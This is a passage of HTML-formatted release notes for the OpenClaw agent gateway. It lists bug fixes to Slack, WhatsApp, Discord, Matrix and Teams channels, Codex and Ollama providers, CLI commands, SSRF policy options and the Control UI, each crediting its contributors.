<li>Agents/Codex: flush accepted debounced steering messages before normal app-server turn cleanup, so inbound follow-ups acknowledged as queued are not dropped when the turn completes before the debounce fires. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Slack/interactive replies: keep rendered buttons and selects within Slack Block Kit value and count limits, and align command argument select values with Slack's option limit, so overlong agent-authored choices no longer make Slack reject the whole block payload. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/interactive replies: drop overlong Block Kit button URLs while preserving valid callback values, so malformed link buttons no longer make Slack reject the whole interactive reply. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: truncate native command argument-menu confirmation text to Slack's dialog limit, so long plugin arg names no longer make fallback buttons render invalid Block Kit payloads. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval metadata context to Slack's element and text limits, so large approval details no longer make Slack reject the approval card. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval update fallback text to Slack's message limit while preserving the rendered approval blocks, so long commands no longer make resolved or expired approval cards stay stale after <code>chat.update</code> rejects <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: cap native command argument-menu fallback rows to Slack's message block limit, so large plugin choice lists no longer make Slack reject the generated menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: drop fallback command argument buttons whose encoded values exceed Slack's button-value limit, so one oversized plugin choice no longer makes Slack reject the whole menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: merge message-tool presentation and interactive blocks on Slack sends, so buttons and selects are no longer dropped when a structured message body is also present. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: cap Block Kit fallback text to Slack's send limit while preserving the rendered blocks, so long context fallbacks no longer make rich Slack messages fail with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: cap Block Kit fallback text on message edits while preserving the rendered blocks, so long context fallbacks no longer make Slack reject <code>chat.update</code> calls with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Channels/WhatsApp: require Baileys outbound message ids before marking auto-replies delivered, so transcript text and ack reactions no longer make failed group replies look sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090958823" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49225" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49225/hovercard" href="https://github.com/openclaw/openclaw/issues/49225">#49225</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</li>
<li>CLI/update: scope packaged Node compile caches by OpenClaw version and install metadata, so global installs no longer reuse stale compiled chunks after package updates. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Channels/Voice call: keep pre-auth webhook in-flight limiting active when socket remote address metadata is missing, so slow-body requests from stripped-IP proxy paths still share the fallback bucket. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351826007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74453/hovercard" href="https://github.com/openclaw/openclaw/pull/74453">#74453</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Plugin SDK/testing: lazy-load TypeScript from the plugin test-contract runtime and add release checks for critical SDK contract entrypoint imports and bundle size, so published packages fail preflight before shipping ESM-incompatible or oversized contract helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/Microsoft Teams: treat configured <code>19:...@thread.tacv2</code> and legacy <code>19:...@thread.skype</code> team/channel IDs as already resolved during startup, avoiding false <code>channels unresolved</code> warnings while preserving Graph name lookup for display-name entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354343671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74683/hovercard" href="https://github.com/openclaw/openclaw/issues/74683">#74683</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>.</li>
<li>CLI/browser: preserve parent flags while lazy-loading browser subcommands, so <code>openclaw browser --json open</code> and <code>openclaw browser --json tabs</code> keep machine-readable output after reparsing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353127836" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74574/hovercard" href="https://github.com/openclaw/openclaw/issues/74574">#74574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devintegeritsm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devintegeritsm">@devintegeritsm</a>.</li>
<li>Exec/elevated: preserve <code>turnSourceChannel</code> as <code>messageProvider</code> on approval-followup runs so <code>tools.elevated.allowFrom.&lt;provider&gt;</code> checks no longer fail with <code>provider=null</code> after the user approves an async elevated command. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354035233" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74646/hovercard" href="https://github.com/openclaw/openclaw/issues/74646">#74646</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xhd2015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xhd2015">@xhd2015</a>.</li>
<li>Plugins/runtime-deps: add <code>openclaw plugins deps</code> inspection and repair with script-free package-manager defaults shared across plugin installers, so operators can repair missing bundled runtime deps without corrupting JSON output or blocking unrelated conflict-free deps. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/output: strip internal <code>[tool calls omitted]</code> replay placeholders from user-facing replies while preserving visible reply whitespace. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353111354" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74573/hovercard" href="https://github.com/openclaw/openclaw/issues/74573">#74573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>Providers/Google Vertex: route authorized_user ADC credentials through OpenClaw's REST transport so Docker installs using gcloud application-default credentials no longer crash in the Google SDK before requests are sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353780535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74628/hovercard" href="https://github.com/openclaw/openclaw/issues/74628">#74628</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhal2001-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhal2001-design">@frankhal2001-design</a>.</li>
<li>ACP/resolver: fall through to thread-bound session resolution when an explicit <code>--session</code> token cannot be resolved while preserving the bad-token diagnostic when no thread binding exists, so Discord slash commands that auto-fill the current thread ID as the positional ACP target no longer return "Unable to resolve session target" errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259261328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66299/hovercard" href="https://github.com/openclaw/openclaw/issues/66299">#66299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/sessions: emit a terminal lifecycle backstop when embedded timeout/error turns return without <code>agent_end</code>, so Gateway sessions no longer stay stuck in <code>running</code> after failover surfaces a timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353527154" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74607/hovercard" href="https://github.com/openclaw/openclaw/issues/74607">#74607</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/millerc79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/millerc79">@millerc79</a>.</li>
<li>Gateway/diagnostics: include stuck-session reason hints and recovery skip causes in warnings, so operators can tell whether a lane is waiting on active work, queued work, or stale bookkeeping. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Codex: bound embedded-run cleanup, trajectory flushing, and command-lane task timeouts after runtime failures, so Discord and other chat sessions return to idle instead of staying stuck in processing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/exec: consume successful metadata-only async exec completions silently so Telegram and other chat surfaces no longer ask users for missing command logs after <code>No session found</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353366864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74595/hovercard" href="https://github.com/openclaw/openclaw/issues/74595">#74595</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gkoch02/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gkoch02">@gkoch02</a>.</li>
<li>Web fetch: add a documented <code>tools.web.fetch.ssrfPolicy.allowIpv6UniqueLocalRange</code> opt-in and thread it through cache keys and DNS/IP checks so trusted fake-IP proxy stacks using <code>fc00::/7</code> can work without broad private-network access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350890451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74351/hovercard" href="https://github.com/openclaw/openclaw/issues/74351">#74351</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>OpenAI Codex: restore <code>/verbose full</code> persistence and app-server tool-output forwarding, and retry Gateway E2E temp-home cleanup so debug runs do not regress on stale validation or cleanup flakes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Anthropic/Meridian: preserve text and thinking content seeded on <code>content_block_start</code> in anthropic-messages streams, so <code>[thinking, text]</code> replies no longer persist as empty turns or trigger empty-response fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351435288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74410/hovercard" href="https://github.com/openclaw/openclaw/issues/74410">#74410</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Channels/Matrix: complete the cross-signing handshake on <code>openclaw matrix verify confirm-sas</code> so the operator's other Matrix device clears its <code>Verifying…</code> loop instead of staying stuck after the agent confirms. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352761902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74542" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74542/hovercard" href="https://github.com/openclaw/openclaw/pull/74542">#74542</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>.</li>
<li>CLI/status: honor channel-specific model context-window overrides when reporting effective context, so channel-scoped sessions reflect the active window in <code>openclaw status</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Sandbox/Docker: tolerate Docker daemon unavailability when sandbox mode is off, so doctor and preflight checks no longer fail on installs that do not run the Docker daemon. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344707479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73671" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73671/hovercard" href="https://github.com/openclaw/openclaw/pull/73671">#73671</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaseonedge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaseonedge">@kaseonedge</a>.</li>
<li>Control UI/mobile: persist mobile chat settings through Lit-managed state and route mobile navigation through the same view-state path so chat panel toggles survive transitions on small viewports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/exports: align sidebar trigger affordances across the resizable divider, mobile layout, and exported-HTML transcript template so the sidebar toggle and exported transcript sidebar render with consistent hit areas and styling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/chat: disable the page refresh affordance while a chat run is active so accidental refreshes do not abort an in-flight reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Memory/LanceDB: return real memory records from <code>openclaw ltm list</code> (with optional <code>--limit</code> and createdAt ordering) instead of an empty placeholder, so the CLI surface matches the documented LTM listing contract. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279969994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67952/hovercard" href="https://github.com/openclaw/openclaw/pull/67952">#67952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangyue19921010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangyue19921010">@zhangyue19921010</a>.</li>
<li>Media: include redacted per-attempt resize failures and resolved model input capabilities in vision-pipeline errors so ARM64 image failures are diagnosable without closing the remaining routing investigation. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352922423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74552/hovercard" href="https://github.com/openclaw/openclaw/issues/74552">#74552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Control UI/i18n: route zh-CN agent, debug, channel-refresh, and exec-approval copy through the locale source while preserving the English <code>Cron Jobs</code> agent tab label and the security-audit command styling. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040969776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39692/hovercard" href="https://github.com/openclaw/openclaw/pull/39692">#39692</a> repair context. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hepeng154833488/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hepeng154833488">@hepeng154833488</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply: honor explicit <code>silentReply.direct: "allow"</code> for clean empty or reasoning-only direct chat turns while keeping the default direct-chat empty-response guard conservative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351432589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74409/hovercard" href="https://github.com/openclaw/openclaw/issues/74409">#74409</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesuskannolis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesuskannolis">@jesuskannolis</a>.</li>
<li>OpenAI Codex: send a non-empty Responses input item when a Codex turn only has systemPrompt-backed instructions, avoiding ChatGPT backend 400s from <code>input: []</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346425036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73820/hovercard" href="https://github.com/openclaw/openclaw/issues/73820">#73820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>.</li>
<li>Ollama: normalize provider-prefixed tool-call names at the native stream boundary so Kimi/Ollama calls such as <code>functions.exec</code> dispatch as <code>exec</code> instead of missing configured tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352343792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74487/hovercard" href="https://github.com/openclaw/openclaw/issues/74487">#74487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afurm">@afurm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carreipeia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carreipeia">@carreipeia</a>.</li>
<li>Security/audit: resolve configured model aliases before model-tier and small-parameter checks, so alias-based GPT-5/Codex configs no longer report false weak-model warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351877071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74455/hovercard" href="https://github.com/openclaw/openclaw/issues/74455">#74455</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>CLI/agent: isolate Gateway-timeout embedded fallback runs under explicit <code>gateway-fallback-*</code> sessions so accepted Gateway runs cannot race transcript locks or replace the routed conversation session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222569416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62981/hovercard" href="https://github.com/openclaw/openclaw/issues/62981">#62981</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>CLI/QR/device-pair: reject malformed public setup URLs before issuing mobile pairing bootstrap tokens, while keeping valid bare host:port setup URLs supported. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Models/UI: hide unauthenticated providers from the default Web chat, <code>/models</code>, and model setup pickers while keeping explicit full-catalog browse paths through <code>view: "all"</code>, <code>/models &lt;provider&gt; all</code>, and <code>models list --all</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351540119" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74423/hovercard" href="https://github.com/openclaw/openclaw/issues/74423">#74423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guarismo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guarismo">@guarismo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Ollama: keep explicit local model runs on target-provider runtime hooks when PI discovery is skipped, so one-shot Ollama calls no longer cold-load unrelated provider runtimes before streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>Slack/prompts: rely on Slack <code>interactiveReplies</code> guidance instead of generic <code>inlineButtons</code> config hints so enabled Slack button directives are not contradicted. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077041050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46647/hovercard" href="https://github.com/openclaw/openclaw/issues/46647">#46647</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeremykoerber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeremykoerber">@jeremykoerber</a>.</li>
<li>Slack/reactions: treat duplicate <code>already_reacted</code> responses as idempotent success so repeated agent reaction adds no longer surface as tool failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291287868" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69005/hovercard" href="https://github.com/openclaw/openclaw/issues/69005">#69005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shipitsteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shipitsteven">@shipitsteven</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Discord: cool down Cloudflare/Error 1015 HTML 429 REST failures during startup application lookup and gateway metadata fetches, add <code>channels.discord.applicationId</code> as an app-id lookup bypass, sanitize HTML bodies before logging, and honor Retry-After before falling back to a conservative cooldown. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038404026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38853/hovercard" href="https://github.com/openclaw/openclaw/issues/38853">#38853</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352352572" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74489" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74489/hovercard" href="https://github.com/openclaw/openclaw/pull/74489">#74489</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Garyko0730/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Garyko0730">@Garyko0730</a>.</li>
<li>Slack/tools: expose <code>fileId</code> in the shared message tool schema so <code>download-file</code> can receive Slack attachment IDs from inbound placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4074134594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45574/hovercard" href="https://github.com/openclaw/openclaw/issues/45574">#45574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chadvegas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chadvegas">@chadvegas</a>.</li>
